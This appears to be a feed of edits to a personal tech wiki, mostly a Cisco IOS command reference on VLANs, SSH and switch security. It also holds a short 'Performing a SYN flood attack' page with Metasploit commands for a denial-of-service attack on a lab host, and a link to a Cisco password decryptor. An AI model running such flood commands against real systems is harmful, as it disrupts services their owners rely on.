&lt;br /&gt;
=== Port Security Aging ===&lt;br /&gt;
==== Enable static aging on an interface ====&lt;br /&gt;
 switchport port-security aging static&lt;br /&gt;
&lt;br /&gt;
==== Enable timed aging on an interface (5 minutes) ====&lt;br /&gt;
 switchport port-security aging time 5&lt;/div&gt;</summary>
		<author><name>50.220.241.211</name></author>
	</entry>
	<entry>
		<id>https://wiki.luccapirovano.com/index.php?title=Cisco_Commands&amp;diff=1069</id>
		<title>Cisco Commands</title>
		<link rel="alternate" type="text/html" href="https://wiki.luccapirovano.com/index.php?title=Cisco_Commands&amp;diff=1069"/>
		<updated>2026-02-04T22:13:02Z</updated>

		<summary type="html">&lt;p&gt;50.220.241.211: /* IPv6 Interface Configuration */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;= Cisco IOS Command Reference =&lt;br /&gt;
&lt;br /&gt;
A quick-reference guide for common Cisco IOS commands on switches and routers.&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== System &amp;amp; Routing Basics ==&lt;br /&gt;
&lt;br /&gt;
=== Enable IPv4 Routing (Layer 3 Switches) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ip routing&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Enable IPv6 Routing (Routers) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ipv6 unicast-routing&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== Device &amp;amp; System Information ==&lt;br /&gt;
&lt;br /&gt;
=== Show MAC Address Table ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show mac address-table&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Show OS and Device Version ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show version&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Show Logged-in Users ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show users&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Show Files ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
dir&lt;br /&gt;
dir nvram:&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== Configuration Files ==&lt;br /&gt;
&lt;br /&gt;
=== Show Configurations ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show running-config&lt;br /&gt;
show startup-config&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Show Interface Config ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show run interface g0/0&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Filter Running Config (grep-like) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show run | include {searchterm}&lt;br /&gt;
show run | begin {searchterm}&lt;br /&gt;
show run | section {section-name}&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Save Running Config ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
copy running-config startup-config&lt;br /&gt;
copy run start&lt;br /&gt;
wr&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== User Privileges &amp;amp; Security ==&lt;br /&gt;
&lt;br /&gt;
=== Enter Privileged Mode ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
enable&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Set Encrypted Enable Password ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
enable secret ThisisaSecret&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Encrypt Plaintext Passwords (Weak Encryption)  ===&lt;br /&gt;
You can decrypt these with publicly available tools like https://keydecryptor.com/decryption-tools/cisco7&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
service password-encryption&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== Interface &amp;amp; Network Status ==&lt;br /&gt;
&lt;br /&gt;
=== Interface IP Summary ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show ip interface brief&lt;br /&gt;
show ipv6 interface brief&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Interface IP Summary (filtered to only interfaces with IPs) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show ip interface brief | exclude unassigned&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
=== Routing Table ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show ip route&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== VLAN &amp;amp; Switching ==&lt;br /&gt;
&lt;br /&gt;
=== Show VLANs ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show vlan brief&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Show Interface VLAN Details ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show interface g0/1 switchport&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Show Trunk Interfaces ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show int trunk&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Clear Tables ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
clear mac address-table&lt;br /&gt;
clear arp-cache&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== Telnet &amp;amp; Remote Access ==&lt;br /&gt;
&lt;br /&gt;
=== Connect via Telnet ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
connect {DeviceName}&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Show Hosts &amp;amp; Sessions ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show hosts&lt;br /&gt;
show sessions&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Disconnect Session ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
disconnect {DeviceName}&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Suspend Active Session ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Ctrl+Shift+6, then x&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== SSH Configuration ==&lt;br /&gt;
&lt;br /&gt;
=== Basic SSH Setup ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ip domain-name cisco.com&lt;br /&gt;
crypto key generate rsa&lt;br /&gt;
ip ssh version 2&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Remove RSA Keys ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
crypto key zeroize rsa&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Create Local User ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
username admin secret ccna&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Set Default Gateway ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ip default-gateway 192.168.10.1&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Enable SSH on VTY Lines ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
line vty 0 15&lt;br /&gt;
 transport input ssh&lt;br /&gt;
 login local&lt;br /&gt;
 exit&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== Global Configuration Mode ==&lt;br /&gt;
&lt;br /&gt;
=== Enter Global Config ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
configure terminal&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Disable DNS Lookup on Typos ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
no ip domain-lookup&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Set MOTD Banner ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
banner motd MESSAGEHERE&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Set Hostname ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
hostname HOSTNAME&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== Line Configuration ==&lt;br /&gt;
&lt;br /&gt;
=== Console Line ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
line con 0&lt;br /&gt;
 password itsasecret&lt;br /&gt;
 login&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== VTY Lines ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
line vty 0 15&lt;br /&gt;
 password itsasecret&lt;br /&gt;
 login&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== Interface Configuration ==&lt;br /&gt;
&lt;br /&gt;
=== Interface Selection ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
interface vlan 1&lt;br /&gt;
interface fa0/1&lt;br /&gt;
interface range fa0/2-3&lt;br /&gt;
interface range fa0/2-3,g0/1&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Enable Interface ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
no shutdown&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Assign IPv4 Address ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ip address 192.168.0.1 255.255.255.0&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== VLAN Configuration ==&lt;br /&gt;
&lt;br /&gt;
=== Create / Configure VLAN ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
vlan 10&lt;br /&gt;
 name MyAwesomeVlan&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== Switchport Configuration ==&lt;br /&gt;
&lt;br /&gt;
=== Access Port ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
switchport mode access&lt;br /&gt;
switchport access vlan 10&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Trunk Port ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
switchport trunk encapsulation dot1q&lt;br /&gt;
switchport mode trunk&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Trunk VLAN Settings ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
switchport trunk allowed vlan 10,20,33,99&lt;br /&gt;
switchport trunk native vlan 99&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== IPv6 Interface Configuration ==&lt;br /&gt;
&lt;br /&gt;
=== Assign IPv6 Address ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ipv6 address 2001:DB8:CAFE:1::1/64&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Assign Link-Local Address ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ipv6 address fe80::1 link-local&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Remove IPv6 Addresses ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
no ipv6 address 2001:DB8:CAFE:1::1/64&lt;br /&gt;
no ipv6 address&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== IPv6 ND Other-Config Flag ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ipv6 nd other-config-flag&lt;br /&gt;
no ipv6 nd other-config-flag&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
**Description:**  &lt;br /&gt;
The `ipv6 nd other-config-flag` command sets the &amp;quot;Other Configuration&amp;quot; flag in IPv6 Neighbor Discovery (ND) messages.  &lt;br /&gt;
- When enabled, it signals to IPv6 hosts that they should obtain additional configuration information (such as DNS server addresses) via DHCPv6, even if they have a stateless autoconfigured address.  &lt;br /&gt;
- Disabling it (`no ipv6 nd other-config-flag`) stops advertising this flag in ND messages.&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== Spanning Tree ==&lt;br /&gt;
&lt;br /&gt;
=== Enable PortFast on an interface ===&lt;br /&gt;
Use PortFast on edge/access ports that connect to end devices.&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/1&lt;br /&gt;
  spanning-tree portfast&lt;br /&gt;
&lt;br /&gt;
=== Enable PortFast globally ===&lt;br /&gt;
Enables PortFast on all access ports.&lt;br /&gt;
&lt;br /&gt;
 spanning-tree portfast default&lt;br /&gt;
&lt;br /&gt;
=== Enable PortFast on a trunk (use with caution) ===&lt;br /&gt;
Only use when the trunk connects to a single end device (not another switch).&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/1&lt;br /&gt;
  spanning-tree portfast trunk&lt;br /&gt;
&lt;br /&gt;
=== Verify PortFast status ===&lt;br /&gt;
&lt;br /&gt;
 show spanning-tree interface GigabitEthernet0/1 detail&lt;br /&gt;
&lt;br /&gt;
=== Disable PortFast on an interface ===&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/1&lt;br /&gt;
  no spanning-tree portfast&lt;br /&gt;
&lt;br /&gt;
=== Best Practice: Enable BPDU Guard with PortFast ===&lt;br /&gt;
Shuts down the port if a BPDU is received, protecting against loops.&lt;br /&gt;
&lt;br /&gt;
Per interface:&lt;br /&gt;
 interface GigabitEthernet0/1&lt;br /&gt;
  spanning-tree portfast&lt;br /&gt;
  spanning-tree bpduguard enable&lt;br /&gt;
&lt;br /&gt;
Globally:&lt;br /&gt;
 spanning-tree portfast default&lt;br /&gt;
 spanning-tree bpduguard default&lt;br /&gt;
&lt;br /&gt;
=== Notes ===&lt;br /&gt;
* Do &#039;&#039;&#039;not&#039;&#039;&#039; enable PortFast on ports connected to other switches&lt;br /&gt;
* Recommended for access/edge ports&lt;br /&gt;
* Incorrect use can cause Layer 2 loops&lt;br /&gt;
&lt;br /&gt;
== DHCP Snooping ==&lt;br /&gt;
&lt;br /&gt;
=== Enable DHCP Snooping globally ===&lt;br /&gt;
Enable DHCP Snooping for the switch.&lt;br /&gt;
&lt;br /&gt;
 ip dhcp snooping&lt;br /&gt;
&lt;br /&gt;
=== Enable DHCP Snooping on a VLAN ===&lt;br /&gt;
DHCP Snooping only operates on specified VLANs.&lt;br /&gt;
&lt;br /&gt;
 ip dhcp snooping vlan 10&lt;br /&gt;
 ip dhcp snooping vlan 20&lt;br /&gt;
&lt;br /&gt;
=== Configure trusted interfaces ===&lt;br /&gt;
Mark uplinks or ports connected to legitimate DHCP servers as trusted.&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/1&lt;br /&gt;
  ip dhcp snooping trust&lt;br /&gt;
&lt;br /&gt;
=== Untrusted interfaces (default) ===&lt;br /&gt;
Access ports are untrusted by default. DHCP server responses are blocked.&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/2&lt;br /&gt;
  no ip dhcp snooping trust&lt;br /&gt;
&lt;br /&gt;
=== Configure DHCP Snooping rate limiting ===&lt;br /&gt;
Protect against DHCP starvation attacks. Limits to 15 DHCP packets per second, will mark port as violating otherwise.&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/2&lt;br /&gt;
  ip dhcp snooping limit rate 15&lt;br /&gt;
&lt;br /&gt;
=== Verify DHCP Snooping status ===&lt;br /&gt;
&lt;br /&gt;
 show ip dhcp snooping&lt;br /&gt;
 show ip dhcp snooping binding&lt;br /&gt;
&lt;br /&gt;
=== Disable DHCP Snooping ===&lt;br /&gt;
&lt;br /&gt;
 no ip dhcp snooping&lt;br /&gt;
 no ip dhcp snooping vlan 10&lt;br /&gt;
&lt;br /&gt;
=== Notes ===&lt;br /&gt;
* Only trusted ports can send DHCP server messages&lt;br /&gt;
* Access ports should remain untrusted&lt;br /&gt;
* Commonly used with &#039;&#039;&#039;Dynamic ARP Inspection&#039;&#039;&#039; and &#039;&#039;&#039;IP Source Guard&#039;&#039;&#039;&lt;br /&gt;
* Requires correct VLAN configuration to function properly&lt;br /&gt;
&lt;br /&gt;
== Dynamic ARP Inspection (DAI) ==&lt;br /&gt;
&lt;br /&gt;
=== Enable DAI globally ===&lt;br /&gt;
Dynamic ARP Inspection requires DHCP Snooping to be enabled.&lt;br /&gt;
&lt;br /&gt;
 ip arp inspection&lt;br /&gt;
&lt;br /&gt;
=== Enable DAI on a VLAN ===&lt;br /&gt;
Specify which VLANs should be protected.&lt;br /&gt;
&lt;br /&gt;
 ip arp inspection vlan 10&lt;br /&gt;
 ip arp inspection vlan 20&lt;br /&gt;
&lt;br /&gt;
=== Configure trusted interfaces ===&lt;br /&gt;
Trust uplinks and ports connected to other switches or routers.&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/1&lt;br /&gt;
  ip arp inspection trust&lt;br /&gt;
&lt;br /&gt;
=== Untrusted interfaces (default) ===&lt;br /&gt;
Access ports are untrusted by default. Invalid ARP packets are dropped.&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/2&lt;br /&gt;
  no ip arp inspection trust&lt;br /&gt;
&lt;br /&gt;
=== Configure ARP rate limiting ===&lt;br /&gt;
Protect against ARP flooding attacks.&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/2&lt;br /&gt;
  ip arp inspection limit rate 15&lt;br /&gt;
&lt;br /&gt;
=== Verify DAI status ===&lt;br /&gt;
&lt;br /&gt;
 show ip arp inspection&lt;br /&gt;
 show ip arp inspection vlan&lt;br /&gt;
 show ip arp inspection interfaces&lt;br /&gt;
&lt;br /&gt;
=== Disable DAI ===&lt;br /&gt;
&lt;br /&gt;
 no ip arp inspection&lt;br /&gt;
 no ip arp inspection vlan 10&lt;br /&gt;
&lt;br /&gt;
=== Notes ===&lt;br /&gt;
* Requires &#039;&#039;&#039;DHCP Snooping&#039;&#039;&#039; to build the ARP binding table&lt;br /&gt;
* Only trusted ports can send unlimited ARP replies&lt;br /&gt;
* Access ports should remain untrusted&lt;br /&gt;
* Commonly deployed with &#039;&#039;&#039;PortFast + BPDU Guard&#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
== Port Security ==&lt;br /&gt;
&lt;br /&gt;
=== Activate Port Security on an interface ===&lt;br /&gt;
The port cannot be a dynamic port:&lt;br /&gt;
 switchport mode access&lt;br /&gt;
Enable Port Security&lt;br /&gt;
 switchport port-security&lt;br /&gt;
&lt;br /&gt;
=== Set the maximum number of mac addresses that can be used on that port ===&lt;br /&gt;
 switchport port-security maximum 1&lt;br /&gt;
&lt;br /&gt;
=== Whitelist a specific mac address ===&lt;br /&gt;
 switchport port-security mac-address 0001.6311.E7BC&lt;br /&gt;
&lt;br /&gt;
=== Enable sticky mode to automatically learn mac addresses ===&lt;br /&gt;
 switchport port-security mac-address sticky&lt;br /&gt;
&lt;br /&gt;
=== Port Security Violation Modes ===&lt;br /&gt;
==== Protect ====&lt;br /&gt;
Silently drops packets from unknown MAC addresses while keeping the port up and generating no alerts.&lt;br /&gt;
 switchport port-security violation protect&lt;br /&gt;
&lt;br /&gt;
==== Restrict ====&lt;br /&gt;
Drops packets from unknown MAC addresses and logs the violation while incrementing the security counter.&lt;br /&gt;
 switchport port-security violation restrict&lt;br /&gt;
&lt;br /&gt;
==== Shutdown ====&lt;br /&gt;
Immediately disables the port when an unknown MAC address is detected, placing it into an error-disabled state.&lt;br /&gt;
 switchport port-security violation shutdown&lt;br /&gt;
&lt;br /&gt;
=== Port Security Aging ===&lt;br /&gt;
==== Enable static aging on an interface ====&lt;br /&gt;
 switchport port-security aging static&lt;br /&gt;
&lt;br /&gt;
==== Enable timed aging on an interface (5 minutes) ====&lt;br /&gt;
 switchport port-security aging time 5&lt;/div&gt;</summary>
		<author><name>50.220.241.211</name></author>
	</entry>
	<entry>
		<id>https://wiki.luccapirovano.com/index.php?title=Performing_a_SYN_flood_attack&amp;diff=1047</id>
		<title>Performing a SYN flood attack</title>
		<link rel="alternate" type="text/html" href="https://wiki.luccapirovano.com/index.php?title=Performing_a_SYN_flood_attack&amp;diff=1047"/>
		<updated>2026-02-02T21:59:16Z</updated>

		<summary type="html">&lt;p&gt;50.220.241.211: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;From Kali Linux:&lt;br /&gt;
&lt;br /&gt;
Open &amp;lt;code&amp;gt;msf-console&amp;lt;/code&amp;gt;: &lt;br /&gt;
 use auxiliary/dos/tcp/synflood&lt;br /&gt;
 show options&lt;br /&gt;
 set INTERFACE virbr0&lt;br /&gt;
 set RHOST 192.168.122.7&lt;br /&gt;
 exploit&lt;/div&gt;</summary>
		<author><name>50.220.241.211</name></author>
	</entry>
	<entry>
		<id>https://wiki.luccapirovano.com/index.php?title=Performing_a_SYN_flood_attack&amp;diff=1046</id>
		<title>Performing a SYN flood attack</title>
		<link rel="alternate" type="text/html" href="https://wiki.luccapirovano.com/index.php?title=Performing_a_SYN_flood_attack&amp;diff=1046"/>
		<updated>2026-02-02T21:59:07Z</updated>

		<summary type="html">&lt;p&gt;50.220.241.211: Created page with &amp;quot;From Kali Linux:  Open msf-console:   use auxiliary/dos/tcp/synflood  show options  set INTERFACE virbr0  set RHOST 192.168.122.7  exploit&amp;quot;&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;From Kali Linux:&lt;br /&gt;
&lt;br /&gt;
Open msf-console: &lt;br /&gt;
 use auxiliary/dos/tcp/synflood&lt;br /&gt;
 show options&lt;br /&gt;
 set INTERFACE virbr0&lt;br /&gt;
 set RHOST 192.168.122.7&lt;br /&gt;
 exploit&lt;/div&gt;</summary>
		<author><name>50.220.241.211</name></author>
	</entry>
	<entry>
		<id>https://wiki.luccapirovano.com/index.php?title=Main_Page&amp;diff=1045</id>
		<title>Main Page</title>
		<link rel="alternate" type="text/html" href="https://wiki.luccapirovano.com/index.php?title=Main_Page&amp;diff=1045"/>
		<updated>2026-02-02T21:58:48Z</updated>

		<summary type="html">&lt;p&gt;50.220.241.211: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&amp;lt;strong&amp;gt;Welcome to Lucca&#039;s Knowledgebase&amp;lt;/strong&amp;gt;&lt;br /&gt;
&amp;lt;hr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Windows: |&lt;br /&gt;
[[Commands]] | [[Win+R Shortcuts]] | [[Windows Keyboard Shortcuts]] | [[Remote Desktop Setup]] | [[End of Life]] | [[Make CMD Open Faster on Windows 11]] | [[Hyper-V on Windows Home]] | [[Domain Setup from Scratch on Server Core]] | [[Example User onboarding &amp;amp; offboarding Scripts for 365]] | [[Keyboard Navigation Scripts]] | [[Registry Tweaks/Fixes]]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;hr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Linux: | [[Distro Download Links]] | [[Linux Commands|Commands]] | [[Docker-Compose]] | [[Bashrc/Zshrc Setup]] | [https://arachnoid.com/SecureShell/index.html Arachnoid.com: How to use SSH] [https://kirbfeels.gianluccapirovano.com/library/ArchivalPurposes/wiki-files/How%20to%20Use%20Secure%20Shell.pdf pdf] | [[Libvirt Setup]] | [[VFIO GPU Passthrough Setup]] | [[VFIO Anti-Cheat Bypass Tools]] | [[Xubuntu Mac Conversion Guide]] | [[Ungoogled Chromium Debian]] | [[Docker Installation on Debian]] | [[Infared Reciever w/ Alpine on the Bulldozer Datto]] | [[Numpad hotkeys on linux]] | [[Split a monitor in two]] | [[Make a udev rule]] | [[Type Unicode Characters]] | [[Screen Recording Options]] | [[Microsoft Authenticator]] | [https://www.debugpoint.com/kvm-share-folder-windows-guest/ Setup A Share Folder between a Linux host and Windows Guest] [https://kirbfeels.gianluccapirovano.com/library/ArchivalPurposes/wiki-files/Share%20Folder%20Between%20Windows%20Guest%20and%20Linux%20Host%20in%20KVM%20using%20virtiofs.pdf pdf] | [[Perform actions based on notification content]]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;hr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pentesting: [[Performing a SYN flood attack]]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;hr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
MacOS: | [[OSX Commands]]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;hr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Javascript: | [[VM Userscript to disable website right-click and copy-blocking]]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;hr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Python: | [[Math Operators]] | [[Python Examples|Examples]]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;hr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Cisco: | [[Cisco Commands|Commands]] | [[Cisco Keyboard Shortcuts|Keyboard Shortcuts]] | [[Example configuration files]] | [[Ethernet: Straight-through VS Crossover Cable]] | [https://en.wikipedia.org/wiki/Path_MTU_Discovery Path MTU Discovery] | [[ipv6]] | [[802.1q]] (Vlan Tagging) |&lt;br /&gt;
&lt;br /&gt;
&amp;lt;hr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Robotics: | [[Nao Robot]]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;hr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Retro Tech: |&lt;br /&gt;
[[Analog Video Articles]] | [[Modeline Generators]] | [https://github.com/antonioginer/ATOM-15 ATOM-15: AMD/ATI Card 15khz bios] | [https://luigiblood.tumblr.com/post/711882982704726016/everything-datamined-about-gba-nso-so-far Deep Dive into Nintendo Switch NSO GBA Link Cable Emulation] [https://kirbfeels.gianluccapirovano.com/library/ArchivalPurposes/wiki-files/Yakumono&#039;s%20Blog_%20Everything%20datamined%20about%20GB_A%20NSO%20so%20far..pdf pdf]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;hr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Digital Archives: |&lt;br /&gt;
[https://archive.org archive.org] | [https://kirbfeels.gianluccapirovano.com/library/ArchivalPurposes kirb.feels archive] [https://en.wikipedia.org/wiki/Library_Genesis Library Genesis]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;hr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Open Source Intelligence: | &lt;br /&gt;
[https://osintframework.com/ OsINT Framework] | [https://www.usphonebook.com/ USPhoneBook]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;hr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
[https://kirbfeels.luccapirovano.com/library/ArchivalPurposes/wiki-files/happy%20monday/YdGUYXws5mD2fxFKxg.webp ☕Happy Monday =D] [https://kirbfeels.luccapirovano.com/library/ArchivalPurposes/wiki-files/happy%20monday/giphy.webp ☕Bom Dia =D] [https://kirbfeels.luccapirovano.com/library/ArchivalPurposes/wiki-files/happy%20monday/tenor.gif ☕??????]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;hr&amp;gt;&lt;/div&gt;</summary>
		<author><name>50.220.241.211</name></author>
	</entry>
	<entry>
		<id>https://wiki.luccapirovano.com/index.php?title=Main_Page&amp;diff=1044</id>
		<title>Main Page</title>
		<link rel="alternate" type="text/html" href="https://wiki.luccapirovano.com/index.php?title=Main_Page&amp;diff=1044"/>
		<updated>2026-02-02T21:58:34Z</updated>

		<summary type="html">&lt;p&gt;50.220.241.211: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&amp;lt;strong&amp;gt;Welcome to Lucca&#039;s Knowledgebase&amp;lt;/strong&amp;gt;&lt;br /&gt;
&amp;lt;hr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
